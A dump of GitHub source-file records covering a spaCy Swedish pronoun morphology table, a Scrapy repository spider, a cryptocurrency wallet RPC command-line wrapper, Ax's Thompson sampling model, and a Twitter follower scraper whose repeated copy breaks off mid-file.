] | superjoe30@gmail.com |
bd9fcd49f98ccc6899ff0965b7a991dca19906f9 | 1d928c3f90d4a0a9a3919a804597aa0a4aab19a3 | /python/spaCy/2017/8/morph_rules.py | 2875eb3c8d6f3e52d7c95b8b56099ed57ab2a886 | [
"MIT"
] | permissive | rosoareslv/SED99 | d8b2ff5811e7f0ffc59be066a5a0349a92cbb845 | a062c118f12b93172e31e8ca115ce3f871b64461 | refs/heads/main | 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null | UTF-8 | Python | false | false | 5,937 | py | # coding: utf8
from __future__ import unicode_literals
from ...symbols import LEMMA
from ...deprecated import PRON_LEMMA
# Used the table of pronouns at https://sv.wiktionary.org/wiki/deras
MORPH_RULES = {
"PRP": {
"jag": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Sing", "Case": "Nom"},
"mig": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Sing", "Case": "Acc"},
"mej": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Sing", "Case": "Acc"},
"du": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Sing", "Case": "Nom"},
"han": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Sing", "Gender": "Masc", "Case": "Nom"},
"honom": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Sing", "Gender": "Masc", "Case": "Acc"},
"hon": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Sing", "Gender": "Fem", "Case": "Nom"},
"henne": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Sing", "Gender": "Fem", "Case": "Acc"},
"det": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Sing", "Gender": "Neut"},
"vi": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Case": "Nom"},
"oss": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Case": "Acc"},
"ni": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Case": "Nom"},
"er": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Case": "Acc"},
"de": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Plur", "Case": "Nom"},
"dom": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Plur", "Case": "Nom"},
"dem": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Plur", "Case": "Acc"},
"dom": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Plur", "Case": "Acc"},
"min": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Sing", "Poss": "Yes", "Reflex": "Yes"},
"mitt": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Sing", "Poss": "Yes", "Reflex": "Yes"},
"mina": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"din": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Sing", "Poss": "Yes", "Reflex": "Yes"},
"ditt": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Sing", "Poss": "Yes", "Reflex": "Yes"},
"dina": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"hans": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Sing", "Gender": "Masc", "Poss": "Yes", "Reflex": "Yes"},
"hans": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Gender": "Masc", "Poss": "Yes", "Reflex": "Yes"},
"hennes": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Sing", "Gender": "Fem", "Poss": "Yes", "Reflex": "Yes"},
"hennes": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Gender": "Fem", "Poss": "Yes", "Reflex": "Yes"},
"dess": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Sing", "Poss": "Yes", "Reflex": "Yes"},
"dess": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"vår": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"våran": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"vårt": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"vårat": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"våra": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "One", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"er": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"eran": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"ert": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"erat": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"era": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Two", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"},
"deras": {LEMMA: PRON_LEMMA, "PronType": "Prs", "Person": "Three", "Number": "Plur", "Poss": "Yes", "Reflex": "Yes"}
},
"VBZ": {
"är": {"VerbForm": "Fin", "Person": "One", "Tense": "Pres", "Mood": "Ind"},
"är": {"VerbForm": "Fin", "Person": "Two", "Tense": "Pres", "Mood": "Ind"},
"är": {"VerbForm": "Fin", "Person": "Three", "Tense": "Pres", "Mood": "Ind"},
},
"VBP": {
"är": {"VerbForm": "Fin", "Tense": "Pres", "Mood": "Ind"}
},
"VBD": {
"var": {"VerbForm": "Fin", "Tense": "Past", "Number": "Sing"},
"vart": {"VerbForm": "Fin", "Tense": "Past", "Number": "Plur"}
}
}
| [
"rodrigosoaresilva@gmail.com"
] | rodrigosoaresilva@gmail.com |
141a5a6aba2ac440c8db01781017828365654ba7 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/addImport/relativeImportWithDotsOnly/foo/bar/test.after.py | 4320a3295cc73ab93a77673cd011ffa5caab9a31 | [
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 44 | py | from .. import lib
from .baz import baz_func | [
"intellij-monorepo-bot-no-reply@jetbrains.com"
] | intellij-monorepo-bot-no-reply@jetbrains.com |
585504f0c092f229fe513fe44804077ba55e94bf | ed54290846b5c7f9556aacca09675550f0af4c48 | /python/scrapy/shiyanlougithub/shiyanlougithub/spiders/repositories.py | 1ba29b6d6b0ed95cf7b9e5c39a7ee14505332f44 | [
"Apache-2.0"
] | permissive | smallyear/linuxLearn | 87226ccd8745cd36955c7e40cafd741d47a04a6f | 342e5020bf24b5fac732c4275a512087b47e578d | refs/heads/master | 2022-03-20T06:02:25.329126 | 2019-08-01T08:39:59 | 2019-08-01T08:39:59 | 103,765,131 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | # -*- coding: utf-8 -*-
import scrapy
from shiyanlougithub.items import ShiyanlougithubItem
class RepositoriesSpider(scrapy.Spider):
name = 'repositories'
@property
def start_urls(self):
url = 'https://github.com/shiyanlou?page={}&tab=repositories'
return (url.format(i) for i in range(1,5))
def parse(self, response):
for res in response.css('li.public'):
item = ShiyanlougithubItem({
'name' : res.xpath('.//a[@itemprop="name codeRepository"]/text()').re_first("\n\s*(.*)"),
'update_time' : res.xpath('.//relative-time/@datetime').extract_first()
})
yield item
| [
"5931263123@163.com"
] | 5931263123@163.com |
b1a2440fab36e02a54c64e490fe489194f24fecc | 7101871e7a82d202483ada3053fec155ce7824a6 | /contrib/bitrpc/bitrpc.py | 578002f747ed223ae8c640ef4ebef27574474037 | [
"MIT"
] | permissive | trumpcoinsupport/TrumpCoin | 633a9992e46cab00774d01e569f4611b7f6b4b54 | 098c62ea249a63ca1cc31d5f37c6209ccdf50e2a | refs/heads/master | 2023-01-11T20:22:03.469608 | 2021-12-31T10:04:39 | 2021-12-31T10:04:39 | 194,952,065 | 15 | 14 | MIT | 2023-01-08T02:49:09 | 2019-07-03T00:24:45 | C++ | UTF-8 | Python | false | false | 9,665 | py | from jsonrpc import ServiceProxy
import sys
import string
import getpass
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:15320")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:15320")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "encryptwallet":
try:
pwd = getpass.getpass(prompt="Enter passphrase: ")
pwd2 = getpass.getpass(prompt="Repeat passphrase: ")
if pwd == pwd2:
access.encryptwallet(pwd)
print "\n---Wallet encrypted. Server stopping, restart to run with encrypted wallet---\n"
else:
print "\n---Passphrases do not match---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Bitcoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Bitcoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = getpass.getpass(prompt="Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = getpass.getpass(prompt="Enter old wallet passphrase: ")
pwd2 = getpass.getpass(prompt="Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported"
| [
"sebgruby@gmail.com"
] | sebgruby@gmail.com |
61076af3e80c5fb17be8652e0ee606478ab8a072 | 8d29d0e5e51422ecddeec20a36c96e5359dfec47 | /ax/models/discrete/thompson.py | a7cf1aabc4239cca842adf7b076b943745f0996d | [
"MIT"
] | permissive | AdrianaMusic/Ax | e5bd0bd72743a000203dee4a47ac2cdec6e16115 | 6e7470423cf9b9c8e83239d689455f5b15b62b7d | refs/heads/master | 2023-03-27T16:32:58.644860 | 2021-03-29T15:38:53 | 2021-03-29T15:40:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,674 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import hashlib
import json
from typing import Dict, List, Optional, Tuple
import numpy as np
from ax.core.types import TConfig, TGenMetadata, TParamValue, TParamValueList
from ax.exceptions.constants import TS_MIN_WEIGHT_ERROR, TS_NO_FEASIBLE_ARMS_ERROR
from ax.exceptions.model import ModelError
from ax.models.discrete_base import DiscreteModel
from ax.utils.common.docutils import copy_doc
class ThompsonSampler(DiscreteModel):
    """Generator for Thompson sampling.
    The generator performs Thompson sampling on the data passed in via `fit`.
    Arms are given weight proportional to the probability that they are
    winners, according to Monte Carlo simulations.
    """
    def __init__(
        self,
        num_samples: int = 10000,
        min_weight: Optional[float] = None,
        uniform_weights: bool = False,
    ) -> None:
        """
        Args:
            num_samples: The number of samples to draw from the posterior.
            min_weight: The minimum weight an arm must be
                given in order for it to be returned from the generator. If not
                specified, will be set to 2 / (number of arms).
            uniform_weights: If True, the arms returned from the
                generator will each be given a weight of 1 / (number of arms).
        """
        self.num_samples = num_samples
        self.min_weight = min_weight
        self.uniform_weights = uniform_weights
        # The following are populated by fit(); they stay None until then.
        self.X = None
        self.Ys = None
        self.Yvars = None
        self.X_to_Ys_and_Yvars = None
    @copy_doc(DiscreteModel.fit)
    def fit(
        self,
        Xs: List[List[TParamValueList]],
        Ys: List[List[float]],
        Yvars: List[List[float]],
        parameter_values: List[TParamValueList],
        outcome_names: List[str],
    ) -> None:
        # Validate Xs (identical arms across metrics, unique rows) and keep
        # a single shared copy of the arm list.
        self.X = self._fit_X(Xs=Xs)
        self.Ys, self.Yvars = self._fit_Ys_and_Yvars(
            Ys=Ys, Yvars=Yvars, outcome_names=outcome_names
        )
        self.X_to_Ys_and_Yvars = self._fit_X_to_Ys_and_Yvars(
            X=self.X, Ys=self.Ys, Yvars=self.Yvars
        )
    @copy_doc(DiscreteModel.gen)
    def gen(
        self,
        n: int,
        parameter_values: List[TParamValueList],
        objective_weights: Optional[np.ndarray],
        outcome_constraints: Optional[Tuple[np.ndarray, np.ndarray]] = None,
        fixed_features: Optional[Dict[int, TParamValue]] = None,
        pending_observations: Optional[List[List[TParamValueList]]] = None,
        model_gen_options: Optional[TConfig] = None,
    ) -> Tuple[List[TParamValueList], List[float], TGenMetadata]:
        if objective_weights is None:
            raise ValueError("ThompsonSampler requires objective weights.")
        arms = self.X
        k = len(arms)
        # Monte-Carlo probability of each arm being the winner.
        weights = self._generate_weights(
            objective_weights=objective_weights, outcome_constraints=outcome_constraints
        )
        min_weight = self.min_weight if self.min_weight is not None else 2.0 / k
        # Second entry is used for tie-breaking
        weighted_arms = [
            (weights[i], np.random.random(), arms[i])
            for i in range(k)
            # pyre-fixme[58]: `>` is not supported for operand types `float` and
            # `Optional[float]`.
            if weights[i] > min_weight
        ]
        if len(weighted_arms) == 0:
            raise ModelError(
                TS_MIN_WEIGHT_ERROR.format(
                    min_weight=min_weight, max_weight=max(weights)
                )
            )
        weighted_arms.sort(reverse=True)
        # n <= 0 means "return every arm that cleared the weight threshold".
        top_weighted_arms = weighted_arms[:n] if n > 0 else weighted_arms
        top_arms = [arm for _, _, arm in top_weighted_arms]
        top_weights = [weight for weight, _, _ in top_weighted_arms]
        if self.uniform_weights:
            top_weights = [1 / len(top_arms) for _ in top_arms]
        # Returned weights are re-normalized to sum to 1; gen metadata is empty.
        return top_arms, [x / sum(top_weights) for x in top_weights], {}
    @copy_doc(DiscreteModel.predict)
    def predict(self, X: List[TParamValueList]) -> Tuple[np.ndarray, np.ndarray]:
        n = len(X) # number of parameterizations at which to make predictions
        m = len(self.Ys) # number of outcomes
        f = np.zeros((n, m)) # array of outcome predictions
        cov = np.zeros((n, m, m)) # array of predictive covariances
        predictX = [self._hash_TParamValueList(x) for x in X]
        for i, X_to_Y_and_Yvar in enumerate(self.X_to_Ys_and_Yvars):
            # iterate through outcomes
            for j, x in enumerate(predictX):
                # iterate through parameterizations at which to make predictions
                if x not in X_to_Y_and_Yvar:
                    raise ValueError(
                        "ThompsonSampler does not support out-of-sample prediction."
                    )
                # Variance goes on the diagonal; off-diagonal covariances are 0.
                f[j, i], cov[j, i, i] = X_to_Y_and_Yvar[x]
        return f, cov
    def _generate_weights(
        self,
        objective_weights: np.ndarray,
        outcome_constraints: Optional[Tuple[np.ndarray, np.ndarray]] = None,
    ) -> List[float]:
        # Draw posterior samples; samples where every arm violated the
        # constraints have already been filtered out.
        samples, fraction_all_infeasible = self._produce_samples(
            num_samples=self.num_samples,
            objective_weights=objective_weights,
            outcome_constraints=outcome_constraints,
        )
        if fraction_all_infeasible > 0.99:
            raise ModelError(TS_NO_FEASIBLE_ARMS_ERROR)
        num_valid_samples = samples.shape[1]
        # Keep resampling until we have num_samples feasible draws, inflating
        # each request by the observed infeasibility rate (min batch of 100).
        while num_valid_samples < self.num_samples:
            num_additional_samples = (self.num_samples - num_valid_samples) / (
                1 - fraction_all_infeasible
            )
            num_additional_samples = int(np.maximum(num_additional_samples, 100))
            new_samples, _ = self._produce_samples(
                num_samples=num_additional_samples,
                objective_weights=objective_weights,
                outcome_constraints=outcome_constraints,
            )
            samples = np.concatenate([samples, new_samples], axis=1)
            num_valid_samples = samples.shape[1]
        # Weight of an arm = fraction of samples in which it had the best
        # (feasible) objective value.
        winner_indices = np.argmax(samples, axis=0) # (num_samples,)
        winner_counts = np.zeros(len(self.X)) # (k,)
        for index in winner_indices:
            winner_counts[index] += 1
        weights = winner_counts / winner_counts.sum()
        return weights.tolist()
    def _produce_samples(
        self,
        num_samples: int,
        objective_weights: np.ndarray,
        outcome_constraints: Optional[Tuple[np.ndarray, np.ndarray]],
    ) -> Tuple[np.ndarray, float]:
        k = len(self.X)
        samples_per_metric = np.zeros(
            (k, num_samples, len(self.Ys))
        ) # k x num_samples x m
        for i, Y in enumerate(self.Ys): # (k x 1)
            Yvar = self.Yvars[i] # (k x 1)
            # Arms are treated as independent: diagonal covariance.
            cov = np.diag(Yvar) # (k x k)
            samples = np.random.multivariate_normal(
                Y, cov, num_samples
            ).T # (k x num_samples)
            samples_per_metric[:, :, i] = samples
        any_violation = np.zeros((k, num_samples), dtype=bool) # (k x num_samples)
        if outcome_constraints:
            # A is (num_constraints x m)
            # b is (num_constraints x 1)
            A, b = outcome_constraints
            # (k x num_samples x m) dot (num_constraints x m)^T
            # = (k x num_samples x m) dot (m x num_constraints)
            # ==> (k x num_samples x num_constraints)
            constraint_values = np.dot(samples_per_metric, A.T)
            violations = constraint_values > b.T
            any_violation = np.max(violations, axis=2) # (k x num_samples)
        objective_values = np.dot(
            samples_per_metric, objective_weights
        ) # (k x num_samples)
        # Infeasible (arm, sample) entries can never win the argmax.
        objective_values[any_violation] = -np.Inf
        best_arm = objective_values.max(axis=0) # (num_samples,)
        all_arms_infeasible = best_arm == -np.Inf # (num_samples,)
        fraction_all_infeasible = all_arms_infeasible.mean()
        # Drop samples where no arm at all was feasible.
        filtered_objective = objective_values[:, ~all_arms_infeasible] # (k x ?)
        return filtered_objective, fraction_all_infeasible
    def _validate_Xs(self, Xs: List[List[TParamValueList]]) -> None:
        """
        1. Require that all Xs have the same arms, i.e. we have observed
        all arms for all metrics. If so, we can safely use Xs[0] exclusively.
        2. Require that all rows of X are unique, i.e. only one observation
        per parameterization.
        """
        if not all(x == Xs[0] for x in Xs[1:]):
            raise ValueError(
                "ThompsonSampler requires that all elements of Xs are identical; "
                "i.e. that we have observed all arms for all metrics."
            )
        X = Xs[0]
        uniqueX = {self._hash_TParamValueList(x) for x in X}
        if len(uniqueX) != len(X):
            raise ValueError(
                "ThompsonSampler requires all rows of X to be unique; "
                "i.e. that there is only one observation per parameterization."
            )
    def _fit_X(self, Xs: List[List[TParamValueList]]) -> List[TParamValueList]:
        """After validation has been performed, it's safe to use Xs[0]."""
        self._validate_Xs(Xs=Xs)
        return Xs[0]
    def _fit_Ys_and_Yvars(
        self, Ys: List[List[float]], Yvars: List[List[float]], outcome_names: List[str]
    ) -> Tuple[List[List[float]], List[List[float]]]:
        """For plain Thompson Sampling, there's nothing to be done here.
        EmpiricalBayesThompsonSampler will overwrite this method to perform
        shrinkage.
        """
        return Ys, Yvars
    def _fit_X_to_Ys_and_Yvars(
        self, X: List[TParamValueList], Ys: List[List[float]], Yvars: List[List[float]]
    ) -> List[Dict[TParamValueList, Tuple[float, float]]]:
        """Construct lists of mappings, one per outcome, of parameterizations
        to a tuple of their mean and variance.
        """
        X_to_Ys_and_Yvars = []
        hashableX = [self._hash_TParamValueList(x) for x in X]
        for (Y, Yvar) in zip(Ys, Yvars):
            X_to_Ys_and_Yvars.append(dict(zip(hashableX, zip(Y, Yvar))))
        return X_to_Ys_and_Yvars
    def _hash_TParamValueList(self, x: TParamValueList) -> str:
        """Hash a list of parameter values. This is safer than converting the
        list to a tuple because of int/floats.
        """
        param_values_str = json.dumps(x)
        return hashlib.md5(param_values_str.encode("utf-8")).hexdigest()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
fcb28620711e0de02486fea670581b9b5545cc98 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/L/LisaTalia/jensonbutton_twitter_followers_2.py | bf8959f7d0ada25a0ceeb119eca07c6ab3c8838c | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,246 | py | import scraperwiki
import simplejson
import urllib2
import sys
# Needs to be in lower case
SCREENNAME = 'iCod'
# API help: https://dev.twitter.com/docs/api/1/get/followers/ids
# Fetch the complete follower-id list for SCREENNAME in one v1 API call.
url = 'http://api.twitter.com/1/followers/ids.json?screen_name=%s' % (urllib2.quote(SCREENNAME))
print url
followers_json = simplejson.loads(scraperwiki.scrape(url))
# print "Found %d followers of %s" % (len(followers_json), SCREENNAME)
followers_json = followers_json['ids'] # get earliest followers first for batching
followers_json.reverse()
# Groups a list in chunks of a given size
def group(lst, n):
    """Yield successive chunks of `lst` as tuples of at most `n` items.

    Bug fix: the original silently dropped the final partial chunk, so any
    trailing followers (fewer than `n`) were never looked up. The last tuple
    may now be shorter than `n`; callers here join the ids with commas, so a
    short final batch is handled fine.
    """
    for start in range(0, len(lst), n):
        yield tuple(lst[start:start + n])
# Where to start? Overlap one batch to increase hit rate if people unfollow etc.
# 'batchdone' persists scraper progress between runs in the ScraperWiki
# key/value store, so an interrupted run resumes near where it stopped.
batchdone = scraperwiki.sqlite.get_var('batchdone', 1)
batchstart = batchdone - 1
if batchstart < 1:
    batchstart = 1
# Take 100 at a time, and do one lookup call for each batch
c = 0
for follower_list in group(followers_json, 100):
    c = c + 1
    if c < batchstart:
        # Skip batches already completed by a previous run.
        continue
    # print "number", c, "out of", len(followers_json) / 100
    # print 'batch of ids:', follower_list
    url = 'http://api.twitter.com/1/users/lookup.json?user_id=%s' % (urllib2.quote(','.join(map(str, follower_list))))
    # print 'getting url:', url
    details_json = simplejson.loads(scraperwiki.scrape(url))
    for detail in details_json:
        # Flatten the profile fields we care about into one row per follower.
        data = {'screen_name': detail['screen_name'],
            'id': detail['id'],'location': detail['location'],
            'bio': detail['description'],
            'followers_count': detail['followers_count'],
            'friends_count': detail['friends_count'],
            'statuses_count': detail['statuses_count'],
            'listed_count': detail['listed_count'],
            'url': detail['url'],
            'verified': detail['verified'],
            'time_zone': detail['time_zone']}
        # print "Found person", data
        scraperwiki.sqlite.save(unique_keys=['id'], data = data)
    # Record progress after every batch so a crash resumes from here.
    scraperwiki.sqlite.save_var('batchdone', c)
import scraperwiki
import simplejson
import urllib2
import sys
# Needs to be in lower case
SCREENNAME = 'iCod'
# API help: https://dev.twitter.com/docs/api/1/get/followers/ids
# Fetch the complete follower-id list for SCREENNAME in one v1 API call.
url = 'http://api.twitter.com/1/followers/ids.json?screen_name=%s' % (urllib2.quote(SCREENNAME))
print url
followers_json = simplejson.loads(scraperwiki.scrape(url))
# print "Found %d followers of %s" % (len(followers_json), SCREENNAME)
followers_json = followers_json['ids'] # get earliest followers first for batching
followers_json.reverse()
# Groups a list in chunks of a given size
def group(lst, n):
    """Yield successive chunks of `lst` as tuples of at most `n` items.

    Bug fix: the original silently dropped the final partial chunk, so any
    trailing followers (fewer than `n`) were never looked up. The last tuple
    may now be shorter than `n`; callers here join the ids with commas, so a
    short final batch is handled fine.
    """
    for start in range(0, len(lst), n):
        yield tuple(lst[start:start + n])
# Where to start? Overlap one batch to increase hit rate if people unfollow etc.
